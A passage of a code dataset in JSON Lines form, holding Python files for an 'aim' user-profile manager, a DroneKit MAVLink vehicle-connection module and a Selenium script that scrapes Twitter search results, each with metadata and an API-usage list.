"attribute"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 28, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 51, "usage_type": "call"}, {"api_name": "utils._str_to_bool", "line_number": 62, "usage_type": "name"}, {"api_name": "utils._str_to_bool", "line_number": 90, "usage_type": "name"}, {"api_name": "disentanglement_lib.config.reproduce.STUDIES", "line_number": 103, "usage_type": "attribute"}, {"api_name": "disentanglement_lib.config.reproduce", "line_number": 103, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.config.experimental.list_physical_devices", "line_number": 110, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.config", "line_number": 110, "usage_type": "attribute"}, {"api_name": 
"tensorflow.compat.v1", "line_number": 110, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.config.experimental.set_memory_growth", "line_number": 115, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.config", "line_number": 115, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1", "line_number": 115, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.config.experimental.list_logical_devices", "line_number": 116, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.config", "line_number": 116, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1", "line_number": 116, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path", "line_number": 128, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "disentanglement_lib.methods.unsupervised.train.train_with_gin", "line_number": 144, "usage_type": "call"}, {"api_name": "disentanglement_lib.methods.unsupervised.train", "line_number": 144, "usage_type": "name"}, {"api_name": "numpy.random.RandomState", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 150, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path", "line_number": 155, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "disentanglement_lib.postprocessing.postprocess.postprocess_with_gin", "line_number": 162, "usage_type": "call"}, {"api_name": "disentanglement_lib.postprocessing.postprocess", "line_number": 162, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 174, "usage_type": "call"}, {"api_name": "os.path", "line_number": 174, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 175, "usage_type": "call"}, {"api_name": "os.path", "line_number": 175, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path", "line_number": 178, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 183, "usage_type": "call"}, {"api_name": "os.path", "line_number": 183, "usage_type": "attribute"}, {"api_name": "disentanglement_lib.evaluation.evaluate.evaluate_with_gin", "line_number": 190, "usage_type": "call"}, {"api_name": "disentanglement_lib.evaluation.evaluate", "line_number": 190, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path", "line_number": 195, "usage_type": "attribute"}, {"api_name": "disentanglement_lib.visualize.visualize_model.visualize", "line_number": 196, "usage_type": "call"}, {"api_name": "disentanglement_lib.visualize.visualize_model", "line_number": 196, "usage_type": "name"}]}
+{"seq_id": "472366304", "text": "import os\nimport json\nimport re\n\nfrom aim.engine.utils import random_str\nfrom aim.engine.configs import (\n AIM_PROFILE_NAME,\n AIM_PROFILE_SSH_DIR_NAME,\n AIM_PROFILE_CONFIG_FILE_NAME,\n)\n\n\nclass AimProfile:\n @staticmethod\n def get_path():\n \"\"\"\n Returns aim profile path, by default at user's home directory\n \"\"\"\n home_path = os.path.expanduser('~')\n aim_profile_path = os.path.join(home_path, AIM_PROFILE_NAME)\n\n return aim_profile_path\n\n def __init__(self):\n self.path = self.get_path()\n self.config_path = os.path.join(self.path, AIM_PROFILE_CONFIG_FILE_NAME)\n self.ssh_path = os.path.join(self.path, AIM_PROFILE_SSH_DIR_NAME)\n self._config = {}\n\n if not os.path.isdir(self.path):\n self.init()\n\n @property\n def config(self):\n \"\"\"\n Config property getter, loads config file if not already loaded and\n returns json object\n \"\"\"\n if len(self._config) == 0:\n if os.path.isfile(self.config_path):\n with open(self.config_path, 'r') as f:\n config = json.load(f)\n self._config = config\n return self._config\n\n @config.setter\n def config(self, config):\n self._config = config\n\n def save_config(self):\n \"\"\"\n Saves object config to config file\n \"\"\"\n with open(self.config_path, 'w') as f:\n f.write(json.dumps(self._config))\n\n def init(self):\n \"\"\"\n Inits aim profile at default path\n \"\"\"\n # Create profile dir\n os.mkdir(self.path)\n\n # Create ssh dir\n os.mkdir(self.ssh_path)\n\n # Create known_hosts file inside ssh dir\n open(os.path.join(self.ssh_path, 'known_hosts'), 'w').close()\n\n # Create profile config file\n with open(self.config_path, 'w') as profile_file:\n profile_file.write(json.dumps({\n 'auth': {},\n }))\n\n def is_auth(self, remote):\n \"\"\"\n Returns `True` if profile has authentication keys for `remote`,\n `False` otherwise\n \"\"\"\n return self.config['auth'].get(remote) is not None\n\n def get_username(self):\n \"\"\"\n Returns username or None\n \"\"\"\n user = self.config.get('user')\n if user:\n return user.get('username')\n return None\n\n def set_username(self, username):\n \"\"\"\n Sets username\n \"\"\"\n if not isinstance(username, str):\n raise TypeError()\n\n if not re.match(r'^[A-Za-z0-9_\\-]{2,}$', username):\n raise AttributeError()\n\n self.config.setdefault('user', {})\n self.config['user']['username'] = username.strip()\n self.save_config()\n\n # def auth(self, remote):\n # \"\"\"\n # Generates RSA key pair for `remote` authentication\n # \"\"\"\n # remote = remote.strip()\n # private_file_name = 'rsa_{r}'.format(o=remote,\n # r=random_str(16))\n # private_key_path = os.path.join(self.ssh_path, private_file_name)\n #\n # # Generate rsa key\n # k = paramiko.RSAKey.generate(bits=4 * 1024)\n #\n # # Save keys inside ssh dir\n # k.write_private_key_file(private_key_path, password=None)\n # public_key = k.get_base64()\n # with open('{}.pub'.format(private_key_path), 'w') as pub_file:\n # pub_file.write(public_key)\n #\n # # Save auth detail into config file\n # self.config['auth'][remote] = {\n # 'key': private_key_path,\n # }\n # self.save_config()\n #\n # return {\n # 'private_key_path': private_key_path,\n # 'public_key': public_key,\n # }\n", "sub_path": "aim/engine/profile/profile.py", "file_name": "profile.py", "file_ext": "py", "file_size_in_byte": 3791, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "os.path.expanduser", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", 
"line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "aim.engine.configs.AIM_PROFILE_NAME", "line_number": 20, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "aim.engine.configs.AIM_PROFILE_CONFIG_FILE_NAME", "line_number": 26, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "aim.engine.configs.AIM_PROFILE_SSH_DIR_NAME", "line_number": 27, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 42, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 55, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 62, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 72, "usage_type": "call"}, {"api_name": "re.match", "line_number": 99, "usage_type": "call"}]}
+{"seq_id": "67649511", "text": "from __future__ import print_function\nimport time\nimport socket\nimport sys\nimport os\nimport platform\nimport re\nfrom pymavlink import mavutil\nfrom Queue import Empty\n\nfrom pkgutil import extend_path\n__path__ = extend_path(__path__, __name__)\n\nif platform.system() == 'Windows':\n from errno import WSAECONNRESET as ECONNABORTED\nelse:\n from errno import ECONNABORTED\n\n# Clean impl of mp dependencies for dronekit\n\nimport dronekit.module.api as api\n\ndef errprinter(*args):\n print(*args, file=sys.stderr)\n\nclass FakeAPI:\n def __init__(self, module):\n self.__vehicle = api.MPVehicle(module)\n self.exit = False\n\n def get_vehicles(self, query=None):\n return [ self.__vehicle ]\n\n# def mav_thread(conn, state):\n\n# return (in_queue, out_queue)\n\nclass MavWriter():\n def __init__(self, queue):\n self.queue = queue\n\n def write(self, pkt):\n self.queue.put(pkt)\n\n def read(self):\n errprinter('writer should not have had a read request')\n os._exit(43)\n\ndef send_heartbeat(master):\n master.mav.heartbeat_send(mavutil.mavlink.MAV_TYPE_GCS, mavutil.mavlink.MAV_AUTOPILOT_INVALID, 0, 0, 0)\n\ndef request_data_stream_send(master, rate=1):\n master.mav.request_data_stream_send(master.target_system, master.target_component,\n mavutil.mavlink.MAV_DATA_STREAM_ALL, rate, 1)\n\nfrom Queue import Queue\nfrom threading import Thread\n\nclass MPFakeState:\n def __init__(self, master, status_printer=None):\n self.master = master\n out_queue = Queue()\n # self.mav_thread = mav_thread(master, self)\n # self.mav = master.mav\n\n self.api = None\n\n # TODO get rid of \"master\" object as exposed,\n # keep it private, expose something smaller for dronekit\n self.out_queue = out_queue\n self.master.mav = mavutil.mavlink.MAVLink(MavWriter(self.out_queue), srcSystem=self.master.source_system, use_native=False)\n\n self.command_map = {}\n self.completions = {}\n\n self.target_system = 0\n self.target_component = 0\n\n self.lat = None\n self.lon = None\n self.alt = None\n\n self.vx = None\n self.vy = None\n self.vz = None\n\n self.airspeed = None\n self.groundspeed = None\n\n self.pitch = None\n self.yaw = None\n self.roll = None\n self.pitchspeed = None\n self.yawspeed = None\n self.rollspeed = None\n\n self.mount_pitch = None\n self.mount_yaw = None\n self.mount_roll = None\n\n self.voltage = -1\n self.current = -1\n self.level = -1\n\n self.rc_readback = {}\n\n self.last_waypoint = 0\n\n self.eph = None\n self.epv = None\n self.satellites_visible = None\n self.fix_type = None # FIXME support multiple GPSs per vehicle - possibly by using componentId\n\n self.rngfnd_distance = None\n self.rngfnd_voltage = None\n\n self.status = type('MPStatus',(object,),{\n 'flightmode': 'AUTO',\n 'armed': False,\n })()\n\n self.mav_param = {} \n\n # Weird\n self.mpstate = self\n self.functions = self\n self.mpstate.settings = self\n\n self.status_printer = status_printer\n\n def fix_targets(self, message):\n pass\n # \"\"\"Set correct target IDs for our vehicle\"\"\"\n # settings = self.mpstate.settings\n # if hasattr(message, 'target_system'):\n # message.target_system = settings.target_system\n # if hasattr(message, 'target_component'):\n # message.target_component = settings.target_component\n\n def module(self, which):\n # psyche\n return self\n\n def param_set(self, name, value, retries=3):\n # TODO dumbly reimplement this using timeout loops\n # because we should actually be awaiting an ACK of PARAM_VALUE\n # changed, but we don't have a proper ack structure, we'll\n # 
instead just wait until the value itself was changed\n\n        name = name.upper()\n        value = float(value)\n        success = False\n        while retries > 0:\n            retries -= 1\n            self.master.param_set_send(name.upper(), value)\n            tstart = time.time()\n            while time.time() - tstart < 1:\n                if self.mav_param[name] == value:\n                    return True\n                time.sleep(0.1)\n        \n        errprinter(\"timeout setting parameter %s to %f\" % (name, value))\n        return False\n\n    def __on_change(self, *args):\n        for a in args:\n            for v in self.api.get_vehicles():\n                v.notify_observers(a)\n\n    def mavlink_packet(self, m):\n        typ = m.get_type()\n        if typ == 'STATUSTEXT':\n            print(re.sub(r'(^|\n)', '>>> \1', m.text.rstrip()))\n        elif typ == 'GLOBAL_POSITION_INT':\n            (self.lat, self.lon) = (m.lat / 1.0e7, m.lon / 1.0e7)\n            (self.vx, self.vy, self.vz) = (m.vx / 100.0, m.vy / 100.0, m.vz / 100.0)\n            self.__on_change('location', 'velocity')\n        elif typ == 'GPS_RAW':\n            pass # better to just use global position int\n            # (self.lat, self.lon) = (m.lat, m.lon)\n            # self.__on_change('location')\n        elif typ == 'GPS_RAW_INT':\n            # (self.lat, self.lon) = (m.lat / 1.0e7, m.lon / 1.0e7)\n            self.eph = m.eph\n            self.epv = m.epv\n            self.satellites_visible = m.satellites_visible\n            self.fix_type = m.fix_type\n            self.__on_change('gps_0')\n        elif typ == \"VFR_HUD\":\n            self.heading = m.heading\n            self.alt = m.alt\n            self.airspeed = m.airspeed\n            self.groundspeed = m.groundspeed\n            self.__on_change('location', 'airspeed', 'groundspeed')\n        elif typ == \"ATTITUDE\":\n            self.pitch = m.pitch\n            self.yaw = m.yaw\n            self.roll = m.roll\n            self.pitchspeed = m.pitchspeed\n            self.yawspeed = m.yawspeed\n            self.rollspeed = m.rollspeed\n            self.__on_change('attitude')\n        elif typ == \"SYS_STATUS\":\n            self.voltage = m.voltage_battery\n            self.current = m.current_battery\n            self.level = m.battery_remaining\n            self.__on_change('battery')\n        elif typ == \"HEARTBEAT\":\n            self.__on_change('mode', 'armed')\n        elif typ in [\"WAYPOINT_CURRENT\", \"MISSION_CURRENT\"]:\n            self.last_waypoint = m.seq\n        elif typ == \"RC_CHANNELS_RAW\":\n            def set(chnum, v):\n                '''Private utility for handling rc channel messages'''\n                # use port to allow ch nums greater than 8\n                self.rc_readback[str(m.port * 8 + chnum)] = v\n\n            set(1, m.chan1_raw)\n            set(2, m.chan2_raw)\n            set(3, m.chan3_raw)\n            set(4, m.chan4_raw)\n            set(5, m.chan5_raw)\n            set(6, m.chan6_raw)\n            set(7, m.chan7_raw)\n            set(8, m.chan8_raw)\n        elif typ == \"MOUNT_STATUS\":\n            self.mount_pitch = m.pointing_a / 100\n            self.mount_roll = m.pointing_b / 100\n            self.mount_yaw = m.pointing_c / 100\n            self.__on_change('mount')\n        elif typ == \"RANGEFINDER\":\n            self.rngfnd_distance = m.distance\n            self.rngfnd_voltage = m.voltage\n            self.__on_change('rangefinder')\n\n        if self.api:\n            for v in self.api.get_vehicles():\n                if v.mavrx_callback:\n                    v.mavrx_callback(m)\n\n    def prepare(self, await_params=False):\n        # errprinter('Await heartbeat.')\n        # TODO this should be more rigorous. 
How to avoid\n # invalid MAVLink prefix '73'\n # invalid MAVLink prefix '13'\n\n params = type('PState',(object,),{\n \"mav_param_count\": -1,\n \"mav_param_set\": [],\n \"loaded\": False,\n \"start\": False,\n })()\n self.mav_param = {}\n self.pstate = params\n self.api = FakeAPI(self)\n\n import atexit\n self.exiting = False\n def onexit():\n self.exiting = True\n atexit.register(onexit)\n\n heartbeat_started = False\n\n def mavlink_thread():\n # Huge try catch in case we see http://bugs.python.org/issue1856\n try:\n # Record the time we received the last \"new\" param.\n last_new_param = time.time()\n last_heartbeat_sent = 0\n last_heartbeat_received = 0\n\n start_duration = 0.2\n repeat_duration = 1\n duration = start_duration\n\n while True:\n # Downtime \n time.sleep(0.05)\n\n # Check the time duration for last \"new\" params exceeds watchdog.\n if params.start:\n if None not in params.mav_param_set:\n params.loaded = True\n\n if not params.loaded and time.time() - last_new_param > duration:\n c = 0\n for i, v in enumerate(params.mav_param_set):\n if v == None:\n self.master.mav.param_request_read_send(self.master.target_system, self.master.target_component, \"\", i)\n c += 1\n if c > 50:\n break\n duration = repeat_duration\n last_new_param = time.time()\n\n # Send 1 heartbeat per second\n if time.time() - last_heartbeat_sent > 1:\n send_heartbeat(self.master)\n last_heartbeat_sent = time.time()\n # Timeout after 5\n if heartbeat_started:\n if last_heartbeat_received == 0:\n last_heartbeat_received = time.time()\n elif time.time() - last_heartbeat_received > 5:\n # raise Exception('Link timeout, no heartbeat in last 5 seconds')\n errprinter('Link timeout, no heartbeat in last 5 seconds')\n last_heartbeat_received = time.time()\n\n while True:\n try:\n msg = self.out_queue.get_nowait()\n self.master.write(msg)\n except socket.error as error:\n if error.errno == ECONNABORTED:\n errprinter('reestablishing connection after read timeout')\n try:\n self.master.close()\n except:\n pass\n self.master = mavutil.mavlink_connection(self.master.address)\n continue\n\n # If connection reset (closed), stop polling.\n return\n except Empty:\n break\n except Exception as e:\n errprinter('mav send error:', e)\n break\n\n while True:\n try:\n msg = self.master.recv_msg()\n except socket.error as error:\n if error.errno == ECONNABORTED:\n errprinter('reestablishing connection after send timeout')\n try:\n self.master.close()\n except:\n pass\n self.master = mavutil.mavlink_connection(self.master.address)\n continue\n\n # If connection reset (closed), stop polling.\n return\n except Exception as e:\n # TODO debug these.\n # errprinter('mav recv error:', e)\n msg = None\n if not msg:\n break\n\n if msg.get_type() == 'PARAM_VALUE':\n # If we discover a new param count, assume we\n # are receiving a new param set.\n if params.mav_param_count != msg.param_count:\n params.loaded = False\n params.start = True\n params.mav_param_count = msg.param_count\n params.mav_param_set = [None]*msg.param_count\n\n # Attempt to set the params. 
We throw an error\n # if the index is out of range of the count or\n # we lack a param_id.\n try:\n if msg.param_index < msg.param_count and msg:\n if params.mav_param_set[msg.param_index] == None:\n last_new_param = time.time()\n duration = start_duration\n params.mav_param_set[msg.param_index] = msg\n self.mav_param[msg.param_id] = msg.param_value\n except:\n import traceback\n traceback.print_exc()\n\n elif msg.get_type() == 'HEARTBEAT':\n self.status.armed = (msg.base_mode & mavutil.mavlink.MAV_MODE_FLAG_SAFETY_ARMED) != 0\n self.status.flightmode = {v: k for k, v in self.master.mode_mapping().items()}[msg.custom_mode]\n last_heartbeat_received = time.time()\n\n if self.api:\n self.mavlink_packet(msg)\n\n except Exception as e:\n # http://bugs.python.org/issue1856\n if self.exiting:\n pass\n else:\n raise e\n\n\n t = Thread(target=mavlink_thread)\n t.daemon = True\n t.start()\n\n # Wait for first heartbeat.\n while True:\n try:\n self.master.wait_heartbeat()\n break\n except mavutil.mavlink.MAVError:\n continue\n heartbeat_started = True\n\n # Request a list of all parameters.\n request_data_stream_send(self.master)\n while True:\n # This fn actually rate limits itself to every 2s.\n # Just retry with persistence to get our first param stream.\n self.master.param_fetch_all()\n time.sleep(0.1)\n if params.mav_param_count > -1:\n break\n\n # We now should get parameters streaming in.\n # We may not get the full set; we leave the logic to mavlink_thread\n # to determine what params we yet need. Wait if await_params is True.\n if await_params:\n while not params.loaded:\n time.sleep(0.1)\n\n return self.api\n\ndef connect(ip, await_params=False, status_printer=errprinter):\n import dronekit.module.api as api\n state = MPFakeState(mavutil.mavlink_connection(ip))\n state.status_printer = status_printer\n # api.init(state)\n return state.prepare(await_params=await_params).get_vehicles()[0]\n", "sub_path": "dronekit/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 15705, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pkgutil.extend_path", "line_number": 12, "usage_type": "call"}, {"api_name": "platform.system", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 24, "usage_type": "attribute"}, {"api_name": "dronekit.module.api.MPVehicle", "line_number": 28, "usage_type": "call"}, {"api_name": "dronekit.module.api", "line_number": 28, "usage_type": "name"}, {"api_name": "os._exit", "line_number": 47, "usage_type": "call"}, {"api_name": "pymavlink.mavutil.mavlink", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pymavlink.mavutil", "line_number": 50, "usage_type": "name"}, {"api_name": "pymavlink.mavutil.mavlink", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pymavlink.mavutil", "line_number": 54, "usage_type": "name"}, {"api_name": "Queue.Queue", "line_number": 62, "usage_type": "call"}, {"api_name": "pymavlink.mavutil.mavlink.MAVLink", "line_number": 71, "usage_type": "call"}, {"api_name": "pymavlink.mavutil.mavlink", "line_number": 71, "usage_type": "attribute"}, {"api_name": "pymavlink.mavutil", "line_number": 71, "usage_type": "name"}, {"api_name": "time.time", "line_number": 156, "usage_type": "call"}, {"api_name": "time.time", "line_number": 157, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 160, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 173, "usage_type": "call"}, {"api_name": 
"atexit.register", "line_number": 261, "usage_type": "call"}, {"api_name": "time.time", "line_number": 269, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 279, "usage_type": "call"}, {"api_name": "time.time", "line_number": 286, "usage_type": "call"}, {"api_name": "time.time", "line_number": 295, "usage_type": "call"}, {"api_name": "time.time", "line_number": 298, "usage_type": "call"}, {"api_name": "time.time", "line_number": 300, "usage_type": "call"}, {"api_name": "time.time", "line_number": 304, "usage_type": "call"}, {"api_name": "time.time", "line_number": 305, "usage_type": "call"}, {"api_name": "time.time", "line_number": 308, "usage_type": "call"}, {"api_name": "socket.error", "line_number": 314, "usage_type": "attribute"}, {"api_name": "errno.ECONNABORTED", "line_number": 315, "usage_type": "name"}, {"api_name": "pymavlink.mavutil.mavlink_connection", "line_number": 321, "usage_type": "call"}, {"api_name": "pymavlink.mavutil", "line_number": 321, "usage_type": "name"}, {"api_name": "Queue.Empty", "line_number": 326, "usage_type": "name"}, {"api_name": "socket.error", "line_number": 335, "usage_type": "attribute"}, {"api_name": "errno.ECONNABORTED", "line_number": 336, "usage_type": "name"}, {"api_name": "pymavlink.mavutil.mavlink_connection", "line_number": 342, "usage_type": "call"}, {"api_name": "pymavlink.mavutil", "line_number": 342, "usage_type": "name"}, {"api_name": "time.time", "line_number": 369, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 375, "usage_type": "call"}, {"api_name": "pymavlink.mavutil.mavlink", "line_number": 378, "usage_type": "attribute"}, {"api_name": "pymavlink.mavutil", "line_number": 378, "usage_type": "name"}, {"api_name": "time.time", "line_number": 380, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 393, "usage_type": "call"}, {"api_name": "pymavlink.mavutil.mavlink", "line_number": 402, "usage_type": "attribute"}, {"api_name": "pymavlink.mavutil", "line_number": 402, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 412, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 421, "usage_type": "call"}, {"api_name": "pymavlink.mavutil.mavlink_connection", "line_number": 427, "usage_type": "call"}, {"api_name": "pymavlink.mavutil", "line_number": 427, "usage_type": "name"}]}
+{"seq_id": "480037083", "text": "\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport time\nimport urllib\nimport calendar\nimport argparse\nimport datetime\n\npython_ver = \"2\"\nbrowser_env = \"firefox\"\n\ndef dformat(date):\n return str(date.year) + \"-\" + str(date.month) + \"-\" + str(date.day)\n\ndef getCalendar_month(month):\n month_array = [\"Jan\",\"Feb\",\"Mar\",\"Apr\",\"May\",\"Jun\",\"Jul\",\"Aug\",\"Sep\",\"Oct\",\"Nov\",\"Dec\"]\n return month_array[month - 1]\n\ndef sformat(date):\n return str(date.day) + \" \" + getCalendar_month(date.month) + \" \" + str(date.year)\n\ndef extractData(data, tdata, date_source):\n date = datetime.datetime.strptime(date_source,\"%Y-%m-%d\")\n until = date + datetime.timedelta(days=1)\n r = [\"date:data\"]\n \n for (e1, e2) in zip(data, tdata):\n tmp = e2.find_all(\"span\")\n t = tmp[0]\n tmp2 = datetime.datetime.fromtimestamp(int(t['data-time']))\n \n if tmp2 > date and until > tmp2:\n #if sformat(date) == e2.text:\n r.append(date_source + \" :\" + e1.text.replace(\"\\n\", \" \").encode('utf-8'))\n return r\n\ndef writeData(data, tdata, word, date_source):\n #try:\n date = datetime.datetime.strptime(date_source,\"%Y-%m-%d\")\n f = open(\"output_\"+ word + \"_\" + date_source +\".txt\",\"w\")\n r = extractData(data, tdata, date_source)\n for e in r:\n #print(e + \"\\n\")\n f.write(e + \"\\n\")\n f.close()\n print(\"Finish word: \" + word +\" date:\" + date_source)\n #except:\n #print(\"save error!\")\n\ndef Ichiyo(word, since, until , interval):\n since = datetime.datetime.strptime(since,\"%Y-%m-%d\")\n until = datetime.datetime.strptime(until,\"%Y-%m-%d\")\n date = since\n while ((date - until) != datetime.timedelta(days=0)):\n date_source = dformat(date)\n r = TWscraping(word, date_source, interval)\n writeData(r[0], r[1], word, date_source)\n date = date + datetime.timedelta(days=1)\n\n\ndef TWscraping(word, date_source, interval):\n date = datetime.datetime.strptime(date_source,\"%Y-%m-%d\")\n if python_ver == \"3\":\n url = urllib.parse.quote(str(word) + \" since:\" + dformat(date - datetime.timedelta(days=1)) + \" until:\" + dformat(date + datetime.timedelta(days=1)))\n else:\n url = urllib.quote(str(word) + \" since:\" + dformat(date - datetime.timedelta(days=1)) + \" until:\" + dformat(date + datetime.timedelta(days=1)))\n \n if browser_env == \"chrome\" or browser_env == \"Chrome\":\n browser = webdriver.Chrome(\"./chromedriver\")\n else:\n browser = webdriver.Firefox()\n browser.get(\"https://twitter.com/search?q=\" + url)\n \n count = 0;\n counttemp = 1;\n print(\"Getting... word: \" + word +\" date:\" + date_source)\n \n try:\n while(count < counttemp):\n count = counttemp\n browser.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(interval)\n html = browser.page_source.encode('utf-8')\n soup = BeautifulSoup(html, \"lxml\")\n result = soup.find_all(\"p\", class_=\"TweetTextSize js-tweet-text tweet-text\")\n result1 = soup.find_all(\"a\",class_=\"tweet-timestamp js-permalink js-nav js-tooltip\")\n counttemp = len(result)\n print(\"Twitte count : \" + str(count))\n except:\n print(\"Error!!\")\n browser.quit()\n return [result, result1]\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Search and Scraping Twitter Data!\")\n parser.add_argument(\"word\", help=u\"Search key word\")\n parser.add_argument(\"since\", help=u\"get twitter data since this date. example: 2016-04-03\")\n parser.add_argument(\"until\", help=u\"get twitter data until this date. 
example: 2016-04-04\")\n parser.add_argument(\"-d\", dest=\"date\",help=\"example: 2015-8-12\")\n parser.add_argument(\"-i\", dest=\"interval\", default=2, help=u\"Update interval: Short if it fails do not cry.\")\n parser.add_argument(\"-p\", dest=\"pyversion\", default=2, help=\"python version default 2\")\n parser.add_argument(\"-b\", dest=\"browser\",default=\"firefox\",help=\"if you will use Chrome [-b Chrome] or [-b chrome]\")\n args = parser.parse_args()\n \n python_ver = args.pyversion\n browser_env = args.browser\n \n #TWscraping(args.word, args.date, args.interval)\n Ichiyo(args.word, args.since, args.until, int(args.interval))\n \n\n", "sub_path": "twitter/TwitterScraping.py", "file_name": "TwitterScraping.py", "file_ext": "py", "file_size_in_byte": 4339, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 24, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 52, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 53, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 53, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 55, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 59, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 63, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 63, "usage_type": "attribute"}, {"api_name": "urllib.parse.quote", "line_number": 65, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 65, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 65, "usage_type": "call"}, {"api_name": "urllib.quote", "line_number": 67, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 67, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 70, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 70, "usage_type": "name"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 72, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 72, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 83, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 85, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 96, "usage_type": "call"}]}
